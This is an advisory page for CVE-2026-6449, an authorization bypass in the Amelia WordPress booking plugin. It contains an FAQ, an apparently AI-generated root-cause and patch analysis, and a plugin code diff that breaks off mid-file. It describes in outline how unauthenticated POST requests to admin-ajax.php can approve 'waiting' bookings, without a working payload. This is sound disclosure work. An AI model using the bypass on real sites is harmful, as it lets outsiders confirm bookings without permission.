What is CVE-2026-6449?

CVE-2026-6449 is a medium severity vulnerability in the Amelia booking plugin for WordPress, affecting versions up to and including 2.1.2. It allows unauthenticated attackers to bypass authorization checks and approve bookings that are in a ‘waiting’ status by sending crafted requests to the admin-ajax endpoint.

How does the vulnerability work?

The vulnerability arises from a logical flaw in the authorization logic within the plugin’s code. When a booking is in ‘waiting’ status, the authorization check is skipped, allowing any unauthenticated user to approve the booking without proper validation.

Who is affected by this vulnerability?

Any WordPress site using the Amelia booking plugin version 2.1.2 or earlier is affected. Site administrators should check their plugin version and update if they are running a vulnerable version.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Amelia plugin installed on your WordPress site. If it is version 2.1.2 or earlier, your site is at risk and should be updated immediately.

How can I fix or mitigate this issue?

The vulnerability has been patched in version 2.3 of the Amelia plugin. To mitigate the issue, update the plugin to the latest version as soon as possible. Regularly check for updates to ensure ongoing security.

What does the CVSS score of 5.3 mean?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized actions on the site, such as approving bookings.

What practical risks does this vulnerability pose?

Successful exploitation of this vulnerability could allow unauthorized users to approve bookings, leading to scheduling conflicts, unauthorized confirmations, and potential financial losses. It could disrupt business operations and damage trust with customers.

What is a proof of concept (PoC)?

A proof of concept is a demonstration that shows how the vulnerability can be exploited. In this case, the PoC illustrates how an attacker can send a crafted request to the admin-ajax endpoint to approve a booking without authentication.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the Amelia plugin until an update can be applied. Additionally, restrict access to the admin-ajax endpoint using server-level controls or security plugins.

Are there any other security measures I should take?

In addition to updating the plugin, ensure that your WordPress installation and all other plugins are up to date. Regularly review user permissions, implement strong authentication methods, and consider using a web application firewall.

How can I stay informed about future vulnerabilities?

To stay informed about future vulnerabilities, subscribe to security mailing lists, follow security blogs, and monitor the official WordPress security updates. Regularly review CVE databases for new vulnerabilities affecting your plugins.

What is the role of the community in addressing vulnerabilities?

The community plays a crucial role in identifying and reporting vulnerabilities. Users are encouraged to report any discovered issues to plugin developers and share information with the community to enhance overall security.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 4, 2026

CVE-2026-6449: Booking for Appointments and Events Calendar – Amelia <= 2.1.2 – Unauthenticated Authorization Bypass via Remote Approval Endpoint (ameliabooking)

CVE ID CVE-2026-6449

Plugin ameliabooking

Severity Medium (CVSS 5.3)

CWE 285

Vulnerable Version 2.1.2

Patched Version 2.3

Disclosed April 30, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6449:

The Booking for Appointments and Events Calendar – Amelia plugin for WordPress versions up to and including 2.1.2 contains an improper authorization vulnerability in the remote booking approval endpoint. This flaw allows unauthenticated attackers to approve any booking that is in ‘waiting’ status. The vulnerability has a CVSS score of 5.3 (Medium) and is classified under CWE-285 (Improper Authorization).

Root Cause:
The root cause lies in a logical short-circuit flaw within the `ApproveBookingRemotelyCommandHandler.php` file. In the vulnerable code (line 97-100), the authorization check uses a compound condition:
“`php
if (
$booking->getStatus()->getValue() !== BookingStatus::WAITING &&
!$customerAS->isCustomerBooking($booking, $user, $command->getField(‘token’))
)
“`
This condition checks if the booking status is NOT ‘waiting’ AND if the token validation fails. When the status IS ‘waiting’, the first condition evaluates to `false`, causing the entire `if` block to be skipped due to the logical AND (`&&`). Consequently, the token validation (`isCustomerBooking()`) is never executed for waiting bookings, allowing any unauthenticated request to bypass authorization entirely. The patched code removes the `BookingStatus::WAITING` check, requiring token validation regardless of booking status.

Exploitation:
An attacker can exploit this vulnerability by sending a crafted POST request to the WordPress admin-ajax endpoint with the appropriate action and booking parameters. The attacker does not need authentication or a valid token. The specific endpoint is `/wp-admin/admin-ajax.php` with the `action` parameter set to the Amelia remote approval handler. The request must include the booking ID and potentially other parameters that match a ‘waiting’ booking. Since the token validation is skipped, the attacker can approve any booking in ‘waiting’ status by simply providing its ID.

Patch Analysis:
The patch modifies the `ApproveBookingRemotelyCommandHandler.php` file. In the vulnerable version (line 97-100), the condition checked if the booking status was not ‘waiting’ before performing token validation. The patched version (line 97) removes the `BookingStatus::WAITING` check entirely, changing the condition to:
“`php
if (!$customerAS->isCustomerBooking($booking, $user, $command->getField(‘token’)))
“`
This ensures token validation is always performed, regardless of the booking’s status. The patch also includes other fixes (e.g., LiteSpeed cache compatibility, Gutenberg block registration outside role checks, and various service/appointment handling improvements) but the critical authorization fix is the removal of the status-based shortcut.

Impact:
Successful exploitation allows an unauthenticated attacker to remotely approve any booking that is in ‘waiting’ status. In the context of a booking/calendar plugin, this could lead to unauthorized service confirmation, scheduling conflicts, data integrity issues, and potential disruption of business operations. Depending on the plugin’s configuration and downstream processes, this could also enable social engineering attacks or cause financial loss if services have associated costs.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/ameliabooking/ameliabooking.php
+++ b/ameliabooking/ameliabooking.php
@@ -3,7 +3,7 @@
 Plugin Name: Amelia
 Plugin URI: https://wpamelia.com/
 Description: Amelia is a simple yet powerful automated booking specialist, working 24/7 to make sure your customers can make appointments and events even while you sleep!
-Version: 2.1.2
+Version: 2.3
 Author: Melograno Ventures
 Author URI: https://melograno.io/
 Text Domain: ameliabooking
@@ -35,6 +35,8 @@
 use AmeliaBookingInfrastructureWPUserRolesUserRoles;
 use AmeliaBookingInfrastructureWPWPMenuSubmenu;
 use AmeliaBookingInfrastructureWPWPMenuSubmenuPageHandler;
+use AmeliaBookingInfrastructureWPCompatibilityLiteSpeedCacheCompatibility;
+use AmeliaBookingInfrastructureWPWPMenuAdminBarMenu;
 use Exception;
 use SlimApp;
 use AmeliaBookingInfrastructureLicence;
@@ -54,13 +56,13 @@
 // Const for uploads path
 if (!defined('AMELIA_UPLOADS_PATH')) {
     $uploadDir = wp_upload_dir();
-    define('AMELIA_UPLOADS_PATH', $uploadDir['basedir']);
+    define('AMELIA_UPLOADS_PATH', !empty($uploadDir['basedir']) ? $uploadDir['basedir'] : '');
 }

 // Const for uploads url
 if (!defined('AMELIA_UPLOADS_URL')) {
     $uploadUrl = wp_upload_dir();
-    define('AMELIA_UPLOADS_URL', set_url_scheme($uploadUrl['baseurl']));
+    define('AMELIA_UPLOADS_URL', !empty($uploadUrl['baseurl']) ? set_url_scheme($uploadUrl['baseurl']) : '');
 }

 // Const for uploads url
@@ -109,7 +111,7 @@

 // Const for Amelia version
 if (!defined('AMELIA_VERSION')) {
-    define('AMELIA_VERSION', '2.1.2');
+    define('AMELIA_VERSION', '2.3');
 }

 // Const for site URL
@@ -214,6 +216,9 @@
     {
         $settingsService = new SettingsService(new SettingsStorage());

+        // Initialize LiteSpeed Cache compatibility
+        LiteSpeedCacheCompatibility::init();
+
         self::weglotConflict($settingsService, true);

         load_plugin_textdomain(AMELIA_DOMAIN, false, plugin_basename(__DIR__) . '/languages/' . AMELIA_LOCALE . '/');
@@ -257,6 +262,14 @@

         $ameliaRole = UserRoles::getUserAmeliaRole(wp_get_current_user());

+        // Register Gutenberg blocks for rendering on frontend (works for all users, logged in or not)
+        AmeliaStepBookingGutenbergBlock::init();
+        AmeliaCatalogBookingGutenbergBlock::init();
+        AmeliaBookingGutenbergBlock::init();
+        AmeliaCatalogGutenbergBlock::init();
+        AmeliaEventsGutenbergBlock::init();
+        AmeliaEventsListBookingGutenbergBlock::init();
+
         // Init menu if user is logged in with amelia role
         if (in_array($ameliaRole, ['admin', 'manager', 'provider', 'customer'])) {
             if ($ameliaRole === 'admin') {
@@ -266,15 +279,6 @@
             // Add TinyMCE button for shortcode generator
             ButtonService::renderButton();

-            // Add Gutenberg Block for shortcode generator
-            AmeliaStepBookingGutenbergBlock::init();
-            AmeliaCatalogBookingGutenbergBlock::init();
-            AmeliaBookingGutenbergBlock::init();
-            AmeliaCatalogGutenbergBlock::init();
-            AmeliaEventsGutenbergBlock::init();
-            AmeliaEventsListBookingGutenbergBlock::init();
-
-
             add_filter('block_categories_all', array('AmeliaBookingPlugin', 'addAmeliaBlockCategory'), 10, 2);
             add_filter('learn-press/frontend-default-scripts', array('AmeliaBookingPlugin', 'learnPressConflict'));
         }
@@ -415,6 +419,16 @@
         $wpMenu->addOptionsPages();
     }

+    public static function initAdminBar()
+    {
+        $settingsService = new SettingsService(new SettingsStorage());
+
+        add_action('admin_bar_menu', function ($wpAdminBar) use ($settingsService) {
+            $adminBarMenu = new AdminBarMenu($settingsService);
+            $adminBarMenu->addAdminBarMenu($wpAdminBar);
+        }, 100);
+    }
+
     public static function adminInit()
     {
         $settingsService = new SettingsService(new SettingsStorage());
@@ -605,7 +619,18 @@
         ];

         if (LicenceLicence::getLicence() === LicenceConstants::LITE) {
-            $links[] = '<a href="https://wpamelia.com/pricing/?utm_source=wp_org&utm_medium=wp_org&utm_content=plugin_row&utm_campaign=wp_org" style="color: #5951F6; font-weight: bold;" target="_blank">Get Amelia Pro</a>';
+            $deactivate = [];
+            if (isset($links['deactivate'])) {
+                $deactivate = ['deactivate' => $links['deactivate']];
+                unset($links['deactivate']);
+            }
+
+            return array_merge(
+                $primaryLinks,
+                $links,
+                ['<a href="https://wpamelia.com/pricing/?utm_source=wp_org&utm_medium=wp_org&utm_content=plugin_row&utm_campaign=wp_org" style="color: #5951F6; font-weight: bold;" target="_blank">Get Amelia Pro</a>'],
+                $deactivate
+            );
         }

         return array_merge($primaryLinks, $links);
@@ -667,6 +692,9 @@
 /** Init the plugin */
 add_action('plugins_loaded', array('AmeliaBookingPlugin', 'init'));

+add_action('init', array('AmeliaBookingInfrastructureWPWPMenuAdminBarMenu', 'enqueueScripts'));
+add_action('init', array('AmeliaBookingPlugin', 'initAdminBar'));
+
 add_action('admin_init', array('AmeliaBookingPlugin', 'adminInit'));

 add_action('admin_menu', array('AmeliaBookingPlugin', 'initMenu'));
--- a/ameliabooking/extensions/divi_5_amelia/server/AmeliaEventsListModule.php
+++ b/ameliabooking/extensions/divi_5_amelia/server/AmeliaEventsListModule.php
@@ -63,6 +63,25 @@
                 $shortcode .= ' event=' . implode(',', $event);
             }

+            $event_to_show = $attrs['event_to_show']['innerContent']['desktop']['value'] ?? 'all';
+            if (count($event) === 0 && $event_to_show !== 'all') {
+                if ($event_to_show === 'custom') {
+                    $start_date = $attrs['start_date']['innerContent']['desktop']['value'] ?? '';
+                    $end_date = $attrs['end_date']['innerContent']['desktop']['value'] ?? '';
+
+                    $has_valid_start = $start_date && preg_match('/^d{4}-d{2}-d{2}$/', $start_date);
+                    $has_valid_end = $end_date && preg_match('/^d{4}-d{2}-d{2}$/', $end_date);
+
+                    if (!$has_valid_start || !$has_valid_end) {
+                        return '';
+                    }
+
+                    $shortcode .= ' range="' . esc_attr($start_date) . ' - ' . esc_attr($end_date) . '"';
+                } else {
+                    $shortcode .= ' range="' . esc_attr($event_to_show) . '"';
+                }
+            }
+
             $tag = $attrs['tags']['innerContent']['desktop']['value'] ?? [];
             if ($tag && count($tag) > 0) {
                 $shortcode .= ' tag="' . implode(',', array_map(function ($t) {
--- a/ameliabooking/extensions/divi_amelia/includes/modules/EventsList/EventsList.php
+++ b/ameliabooking/extensions/divi_amelia/includes/modules/EventsList/EventsList.php
@@ -71,6 +71,42 @@
                 'toggle_slug'     => 'main_content',
                 'option_category' => 'basic_option',
             ),
+            'event_to_show' => array(
+                'label'           => esc_html__(BackendStrings::get('event_time_scope'), 'divi-divi_amelia'),
+                'type'            => 'select',
+                'options'         => array(
+                    'all'    => BackendStrings::get('all_events'),
+                    'future' => BackendStrings::get('future_events'),
+                    'past'   => BackendStrings::get('past_events'),
+                    'custom' => BackendStrings::get('custom_range'),
+                ),
+                'default'         => 'all',
+                'toggle_slug'     => 'main_content',
+                'option_category' => 'basic_option',
+                'show_if'         => array(
+                    'booking_params' => 'on',
+                ),
+            ),
+            'start_date' => array(
+                'label'           => esc_html__(BackendStrings::get('red_start_date'), 'divi-divi_amelia'),
+                'type'            => 'amelia_date_picker',
+                'toggle_slug'     => 'main_content',
+                'option_category' => 'basic_option',
+                'show_if'         => array(
+                    'booking_params' => 'on',
+                    'event_to_show'  => 'custom',
+                ),
+            ),
+            'end_date' => array(
+                'label'           => esc_html__(BackendStrings::get('red_end_date'), 'divi-divi_amelia'),
+                'type'            => 'amelia_date_picker',
+                'toggle_slug'     => 'main_content',
+                'option_category' => 'basic_option',
+                'show_if'         => array(
+                    'booking_params' => 'on',
+                    'event_to_show'  => 'custom',
+                ),
+            ),
             'events' => array(
                 'label'           => esc_html__(BackendStrings::get('select_event'), 'divi-divi_amelia'),
                 'type'            => 'amelia_multi_select',
@@ -184,6 +220,26 @@
         }
         if ($preselect === 'on') {
             $event = $this->checkValues($this->props['events']);
+
+            // Add event_to_show range logic (only if no specific event is selected)
+            if (empty($event) && !empty($this->props['event_to_show']) && $this->props['event_to_show'] !== 'all') {
+                if ($this->props['event_to_show'] === 'custom') {
+                    $startDate = !empty($this->props['start_date']) ? $this->props['start_date'] : '';
+                    $endDate = !empty($this->props['end_date']) ? $this->props['end_date'] : '';
+
+                    $has_valid_start = $startDate && preg_match('/^d{4}-d{2}-d{2}$/', $startDate);
+                    $has_valid_end = $endDate && preg_match('/^d{4}-d{2}-d{2}$/', $endDate);
+
+                    if (!$has_valid_start || !$has_valid_end) {
+                        return '';
+                    }
+
+                    $shortcode .= ' range="' . $startDate . ' - ' . $endDate . '"';
+                } else {
+                    $shortcode .= ' range="' . $this->props['event_to_show'] . '"';
+                }
+            }
+
             $tag   = $this->props['tags'];
             if ($event && count($event) > 0) {
                 $shortcode .= ' event=' . implode(',', $event);
--- a/ameliabooking/src/Application/Commands/Bookable/Category/GetCategoryDeleteEffectCommandHandler.php
+++ b/ameliabooking/src/Application/Commands/Bookable/Category/GetCategoryDeleteEffectCommandHandler.php
@@ -10,9 +10,9 @@
 use AmeliaBookingApplicationCommandsCommandResult;
 use AmeliaBookingApplicationCommandsCommandHandler;
 use AmeliaBookingInfrastructureCommonExceptionsQueryExecutionException;
+use AmeliaBookingInfrastructureRepositoryBookableServicePackageRepository;
 use AmeliaBookingInfrastructureRepositoryBookableServiceServiceRepository;
 use AmeliaBookingDomainCollectionCollection;
-use InteropContainerExceptionContainerException;
 use SlimExceptionContainerValueNotFoundException;

 /**
@@ -29,7 +29,6 @@
      * @throws ContainerValueNotFoundException
      * @throws AccessDeniedException
      * @throws QueryExecutionException
-     * @throws ContainerException
      * @throws InvalidArgumentException
      */
     public function handle(GetCategoryDeleteEffectCommand $command)
@@ -46,6 +45,9 @@
         /** @var ServiceRepository $serviceRepository */
         $serviceRepository = $this->getContainer()->get('domain.bookable.service.repository');

+        /** @var PackageRepository $packageRepository */
+        $packageRepository = $this->container->get('domain.bookable.package.repository');
+
         /** @var Collection $services */
         $services = $serviceRepository->getByCriteria(['categories' => [$command->getArg('id')]]);

@@ -73,11 +75,18 @@
             }
         }

+        /** @var Collection $packages */
+        $packages = $services->length() ? $packageRepository->getByCriteria(['services' => $services->keys()]) : new Collection();
+
+        if ($packages->length()) {
+            $messageKey = 'red_category_failed_to_be_deleted';
+        }
+
         $result->setResult(CommandResult::RESULT_SUCCESS);
         $result->setMessage('Successfully retrieved message.');
         $result->setData(
             [
-                'valid'   => !($categoryServiceIds && ($appointmentsCount['futureAppointments'] || $appointmentsCount['packageAppointments'])),
+                'valid'       => !($categoryServiceIds && ($appointmentsCount['futureAppointments'] || $appointmentsCount['packageAppointments'])),
                 'messageKey'  => $messageKey,
                 'messageData' => $messageData,
             ]
--- a/ameliabooking/src/Application/Commands/Bookable/Service/DeleteServiceCommandHandler.php
+++ b/ameliabooking/src/Application/Commands/Bookable/Service/DeleteServiceCommandHandler.php
@@ -11,12 +11,13 @@
 use AmeliaBookingApplicationCommandsCommandResult;
 use AmeliaBookingApplicationCommonExceptionsAccessDeniedException;
 use AmeliaBookingApplicationServicesBookableBookableApplicationService;
+use AmeliaBookingDomainCollectionCollection;
 use AmeliaBookingDomainCommonExceptionsInvalidArgumentException;
 use AmeliaBookingDomainEntityBookableServiceService;
 use AmeliaBookingDomainEntityEntities;
 use AmeliaBookingInfrastructureCommonExceptionsQueryExecutionException;
+use AmeliaBookingInfrastructureRepositoryBookableServicePackageRepository;
 use AmeliaBookingInfrastructureRepositoryBookableServiceServiceRepository;
-use InteropContainerExceptionContainerException;
 use SlimExceptionContainerValueNotFoundException;

 /**
@@ -34,7 +35,6 @@
      * @throws InvalidArgumentException
      * @throws QueryExecutionException
      * @throws AccessDeniedException
-     * @throws ContainerException
      */
     public function handle(DeleteServiceCommand $command)
     {
@@ -51,15 +51,21 @@

         $appointmentsCount = $bookableApplicationService->getAppointmentsCountForServices([$command->getArg('id')]);

-        /** @var ServiceRepository $serviceRepository */
-        $serviceRepository = $this->container->get('domain.bookable.service.repository');
+        if ($appointmentsCount['futureAppointments']) {
+            $result->setResult(CommandResult::RESULT_CONFLICT);
+            $result->setMessage('Could not delete service.');
+            $result->setData([]);

-        /** @var Service $service */
-        $service = $serviceRepository->getByCriteria(
-            ['services' => [$command->getArg('id')]]
-        )->getItem($command->getArg('id'));
+            return $result;
+        }

-        if ($appointmentsCount['futureAppointments']) {
+        /** @var PackageRepository $packageRepository */
+        $packageRepository = $this->container->get('domain.bookable.package.repository');
+
+        /** @var Collection $packages */
+        $packages = $packageRepository->getByCriteria(['services' => [$command->getArg('id')]]);
+
+        if ($packages->length()) {
             $result->setResult(CommandResult::RESULT_CONFLICT);
             $result->setMessage('Could not delete service.');
             $result->setData([]);
@@ -67,6 +73,14 @@
             return $result;
         }

+        /** @var ServiceRepository $serviceRepository */
+        $serviceRepository = $this->container->get('domain.bookable.service.repository');
+
+        /** @var Service $service */
+        $service = $serviceRepository->getByCriteria(
+            ['services' => [$command->getArg('id')]]
+        )->getItem($command->getArg('id'));
+
         $serviceRepository->beginTransaction();

         do_action('amelia_before_service_deleted', $service->toArray());
--- a/ameliabooking/src/Application/Commands/Bookable/Service/GetServiceDeleteEffectCommandHandler.php
+++ b/ameliabooking/src/Application/Commands/Bookable/Service/GetServiceDeleteEffectCommandHandler.php
@@ -4,12 +4,13 @@

 use AmeliaBookingApplicationCommonExceptionsAccessDeniedException;
 use AmeliaBookingApplicationServicesBookableBookableApplicationService;
+use AmeliaBookingDomainCollectionCollection;
 use AmeliaBookingDomainCommonExceptionsInvalidArgumentException;
 use AmeliaBookingDomainEntityEntities;
 use AmeliaBookingApplicationCommandsCommandResult;
 use AmeliaBookingApplicationCommandsCommandHandler;
 use AmeliaBookingInfrastructureCommonExceptionsQueryExecutionException;
-use InteropContainerExceptionContainerException;
+use AmeliaBookingInfrastructureRepositoryBookableServicePackageRepository;
 use SlimExceptionContainerValueNotFoundException;

 /**
@@ -26,7 +27,6 @@
      * @throws ContainerValueNotFoundException
      * @throws AccessDeniedException
      * @throws QueryExecutionException
-     * @throws ContainerException
      * @throws InvalidArgumentException
      */
     public function handle(GetServiceDeleteEffectCommand $command)
@@ -37,6 +37,9 @@

         $result = new CommandResult();

+        /** @var PackageRepository $packageRepository */
+        $packageRepository = $this->container->get('domain.bookable.package.repository');
+
         /** @var BookableApplicationService $bookableAS */
         $bookableAS = $this->getContainer()->get('application.bookable.service');

@@ -55,11 +58,18 @@
             $messageData = ['count' => $appointmentsCount['pastAppointments']];
         }

+        /** @var Collection $packages */
+        $packages = $packageRepository->getByCriteria(['services' => [$command->getArg('id')]]);
+
+        if ($packages->length()) {
+            $messageKey = 'red_service_failed_to_be_deleted';
+        }
+
         $result->setResult(CommandResult::RESULT_SUCCESS);
         $result->setMessage('Successfully retrieved message.');
         $result->setData(
             [
-                'valid'   => $appointmentsCount['futureAppointments'] ? false : true,
+                'valid'       => !$appointmentsCount['futureAppointments'] && !$packages->length(),
                 'messageKey'  => $messageKey,
                 'messageData' => $messageData,
             ]
--- a/ameliabooking/src/Application/Commands/Booking/Appointment/AddAppointmentCommandHandler.php
+++ b/ameliabooking/src/Application/Commands/Booking/Appointment/AddAppointmentCommandHandler.php
@@ -16,6 +16,7 @@
 use AmeliaBookingDomainEntityBookableServiceService;
 use AmeliaBookingDomainEntityBookingAppointmentAppointment;
 use AmeliaBookingDomainEntityBookingAppointmentCustomerBooking;
+use AmeliaBookingDomainEntityCouponCoupon;
 use AmeliaBookingDomainEntityEntities;
 use AmeliaBookingDomainEntityPaymentPayment;
 use AmeliaBookingDomainEntityUserAbstractUser;
@@ -27,6 +28,7 @@
 use AmeliaBookingInfrastructureCommonExceptionsNotFoundException;
 use AmeliaBookingInfrastructureCommonExceptionsQueryExecutionException;
 use AmeliaBookingInfrastructureRepositoryBookingAppointmentAppointmentRepository;
+use AmeliaBookingInfrastructureRepositoryCouponCouponRepository;
 use Exception;
 use InteropContainerExceptionContainerException;
 use SlimExceptionContainerValueNotFoundException;
@@ -124,10 +126,24 @@

         $maxDuration = 0;

-        foreach ($appointmentData['bookings'] as $booking) {
+        foreach ($appointmentData['bookings'] as $key => $booking) {
             if ($booking['duration'] > $maxDuration && ($booking['status'] === BookingStatus::APPROVED || BookingStatus::PENDING)) {
                 $maxDuration = $booking['duration'];
             }
+
+            $couponId = !empty($booking['coupon']['id'])
+                ? $booking['coupon']['id']
+                : (!empty($booking['couponId']) ? $booking['couponId'] : null);
+
+            if ($couponId) {
+                /** @var CouponRepository $couponRepository */
+                $couponRepository = $this->getContainer()->get('domain.coupon.repository');
+
+                /** @var Coupon $coupon */
+                $coupon = $couponRepository->getById($couponId);
+
+                $appointmentData['bookings'][$key]['coupon'] = $coupon ? $coupon->toArray() : null;
+            }
         }

         if ($maxDuration) {
--- a/ameliabooking/src/Application/Commands/Booking/Appointment/ApproveBookingRemotelyCommandHandler.php
+++ b/ameliabooking/src/Application/Commands/Booking/Appointment/ApproveBookingRemotelyCommandHandler.php
@@ -94,10 +94,7 @@

         $booking->setToken(new Token($token['token']));

-        if (
-            $booking->getStatus()->getValue() !== BookingStatus::WAITING &&
-            !$customerAS->isCustomerBooking($booking, $user, $command->getField('token'))
-        ) {
+        if (!$customerAS->isCustomerBooking($booking, $user, $command->getField('token'))) {
             throw new AccessDeniedException('You are not allowed to update booking status');
         }

--- a/ameliabooking/src/Application/Commands/Booking/Appointment/GetAppointmentBookingsCommandHandler.php
+++ b/ameliabooking/src/Application/Commands/Booking/Appointment/GetAppointmentBookingsCommandHandler.php
@@ -212,7 +212,9 @@
                     $customersNoShowCountIds[] = $booking->getCustomerId()->getValue();
                 }

-                $bookedSpots += $booking->getPersons()->getValue();
+                if (in_array($booking->getStatus()->getValue(), ['approved', 'pending'], true)) {
+                    $bookedSpots += $booking->getPersons()->getValue();
+                }

                 $bookings[] = [
                     'id'       => $booking->getId()->getValue(),
@@ -227,6 +229,8 @@
                         ),
                         'status' => $paymentAS->getFullStatus($booking->toArray(), 'appointment'),
                     ],
+                    'created'  => $booking->getCreated() ?
+                        $booking->getCreated()->getValue()->format('Y-m-d') : null,
                 ];

                 $isPackageAppointment = !empty($booking->getPackageCustomerService());
--- a/ameliabooking/src/Application/Commands/Booking/Appointment/GetPackageAppointmentsCommand.php
+++ b/ameliabooking/src/Application/Commands/Booking/Appointment/GetPackageAppointmentsCommand.php
@@ -1,14 +0,0 @@
-<?php
-
-namespace AmeliaBookingApplicationCommandsBookingAppointment;
-
-use AmeliaBookingApplicationCommandsCommand;
-
-/**
- * Class GetPackageAppointmentsCommand
- *
- * @package AmeliaBookingApplicationCommandsBookingAppointment
- */
-class GetPackageAppointmentsCommand extends Command
-{
-}
--- a/ameliabooking/src/Application/Commands/Booking/Appointment/GetPackageAppointmentsCommandHandler.php
+++ b/ameliabooking/src/Application/Commands/Booking/Appointment/GetPackageAppointmentsCommandHandler.php
@@ -1,282 +0,0 @@
-<?php
-
-namespace AmeliaBookingApplicationCommandsBookingAppointment;
-
-use AmeliaBookingApplicationCommandsCommandHandler;
-use AmeliaBookingApplicationCommandsCommandResult;
-use AmeliaBookingApplicationCommonExceptionsAccessDeniedException;
-use AmeliaBookingApplicationServicesBookableAbstractPackageApplicationService;
-use AmeliaBookingApplicationServicesBookingAppointmentApplicationService;
-use AmeliaBookingApplicationServicesBookingBookingApplicationService;
-use AmeliaBookingDomainCollectionCollection;
-use AmeliaBookingDomainCommonExceptionsAuthorizationException;
-use AmeliaBookingDomainCommonExceptionsInvalidArgumentException;
-use AmeliaBookingDomainEntityBookableServiceService;
-use AmeliaBookingDomainEntityBookingAppointmentAppointment;
-use AmeliaBookingDomainEntityBookingAppointmentCustomerBooking;
-use AmeliaBookingDomainEntityEntities;
-use AmeliaBookingDomainEntityUserAbstractUser;
-use AmeliaBookingDomainServicesDateTimeDateTimeService;
-use AmeliaBookingDomainServicesSettingsSettingsService;
-use AmeliaBookingInfrastructureCommonExceptionsQueryExecutionException;
-use AmeliaBookingInfrastructureRepositoryBookableServicePackageCustomerRepository;
-use AmeliaBookingInfrastructureRepositoryBookableServiceServiceRepository;
-use AmeliaBookingInfrastructureRepositoryBookingAppointmentCustomerBookingRepository;
-
-/**
- * Class GetPackageAppointmentsCommandHandler
- *
- * @package AmeliaBookingApplicationCommandsBookingAppointment
- */
-class GetPackageAppointmentsCommandHandler extends CommandHandler
-{
-    /**
-     * @param GetPackageAppointmentsCommand $command
-     *
-     * @return CommandResult
-     *
-     * @throws InvalidArgumentException
-     * @throws QueryExecutionException
-     * @throws AccessDeniedException
-     */
-    public function handle(GetPackageAppointmentsCommand $command)
-    {
-        $result = new CommandResult();
-
-        /** @var ServiceRepository $serviceRepository */
-        $serviceRepository = $this->container->get('domain.bookable.service.repository');
-
-        /** @var PackageCustomerRepository $packageCustomerRepository */
-        $packageCustomerRepository = $this->container->get('domain.bookable.packageCustomer.repository');
-
-        /** @var AbstractPackageApplicationService $packageAS */
-        $packageAS = $this->container->get('application.bookable.package');
-
-        /** @var SettingsService $settingsDS */
-        $settingsDS = $this->container->get('domain.settings.service');
-
-        /** @var BookingApplicationService $bookingAS */
-        $bookingAS = $this->container->get('application.booking.booking.service');
-
-        /** @var AppointmentApplicationService $appointmentAS */
-        $appointmentAS = $this->container->get('application.booking.appointment.service');
-
-        try {
-            /** @var AbstractUser $user */
-            $user = $command->getUserApplicationService()->authorization(null, $command->getCabinetType());
-        } catch (AuthorizationException $e) {
-            $result->setResult(CommandResult::RESULT_ERROR);
-            $result->setData(
-                [
-                    'reauthorize' => true
-                ]
-            );
-
-            return $result;
-        }
-
-        $params = $command->getField('params');
-
-        if ($user && $user->getType() === Entities::PROVIDER) {
-            $params['providers'] = [$user->getId()->getValue()];
-        }
-
-        if ($user && $user->getType() === Entities::CUSTOMER) {
-            $params['customers'] = [$user->getId()->getValue()];
-        }
-
-        if (!empty($params['dates'])) {
-            !empty($params['dates'][0]) ? $params['dates'][0] .= ' 00:00:00' : null;
-            !empty($params['dates'][1]) ? $params['dates'][1] .= ' 23:59:59' : null;
-        }
-
-        $availablePackageBookings = [];
-
-        $packageCustomerIds = [];
-
-        $noResultsManagePackagesFilters = false;
-
-        $totalPackagePurchases = 0;
-
-        $customers = isset($params['customerId']) ? [$params['customerId']] : [];
-
-        if (!empty($params['packageStatus']) || !empty($params['page']) || !empty($params['bookingsCount'])) {
-            $packageCustomerIds = $packageCustomerRepository->getFilteredIds(
-                [
-                    'dates'     => !empty($params['dates']) ? $params['dates'] : [],
-                    'packages'  => !empty($params['packageId']) ? [$params['packageId']] : [],
-                    'page'      => !empty($params['page']) ? $params['page'] : null,
-                    'status'    => !empty($params['packageStatus']) ? $params['packageStatus'] : null,
-                    'customers' => $customers,
-                ],
-                $settingsDS->getSetting('general', 'itemsPerPage')
-            );
-
-            $noResultsManagePackagesFilters = !$packageCustomerIds;
-
-            $totalPackagePurchases = sizeof($packageCustomerRepository->getFilteredIds(
-                [
-                    'packageCustomerIds' => $packageCustomerIds ?: [],
-                    'purchased'          => !empty($params['dates']) ? $params['dates'] : [],
-                    'packages'           => !empty($params['packageId']) ? [$params['packageId']] : [],
-                    'packageStatus'      => !empty($params['packageStatus']) ? $params['packageStatus'] : null,
-                    'customers'          => $customers
-                ]
-            ));
-        }
-
-        /**
-         * @var Collection $appointments
-         */
-        $appointments = new Collection();
-
-        if (isset($params['customerId'])) {
-            unset($params['customerId']);
-        }
-
-        $customersNoShowCountIds = [];
-
-        $noShowTagEnabled = $settingsDS->isFeatureEnabled('noShowTag');
-
-        if (!$noResultsManagePackagesFilters) {
-            $availablePackageBookings = $packageAS->getPackageAvailability(
-                $appointments,
-                [
-                    'packageCustomerIds' => !empty($packageCustomerIds) ? $packageCustomerIds : [],
-                    'purchased'          => !empty($params['dates']) ? $params['dates'] : [],
-                    'customers'          => $customers,
-                    'packageId'          => !empty($params['packageId']) ? (int)$params['packageId'] : null,
-                    'managePackagePage'  => true
-                ]
-            );
-
-            if ($noShowTagEnabled && !!$availablePackageBookings) {
-                $customersNoShowCountIds[] = $availablePackageBookings[0]['customerId'];
-            }
-        }
-
-        /** @var Collection $services */
-        $services = $serviceRepository->getAllArrayIndexedById();
-
-        $packageAS->setPackageBookingsForAppointments($appointments);
-
-        $occupiedTimes = [];
-
-        $currentDateTime = DateTimeService::getNowDateTimeObject();
-
-        $groupedAppointments = [];
-
-        /** @var Appointment $appointment */
-        foreach ($appointments->getItems() as $appointment) {
-            /** @var Service $service */
-            $service = $services->getItem($appointment->getServiceId()->getValue());
-
-            $bookingsCount = 0;
-
-            /** @var CustomerBooking $booking */
-            foreach ($appointment->getBookings()->getItems() as $booking) {
-                // fix for wrongly saved JSON
-                if (
-                    $booking->getCustomFields() &&
-                    json_decode($booking->getCustomFields()->getValue(), true) === null
-                ) {
-                    $booking->setCustomFields(null);
-                }
-
-                if ($bookingAS->isBookingApprovedOrPending($booking->getStatus()->getValue())) {
-                    $bookingsCount++;
-                }
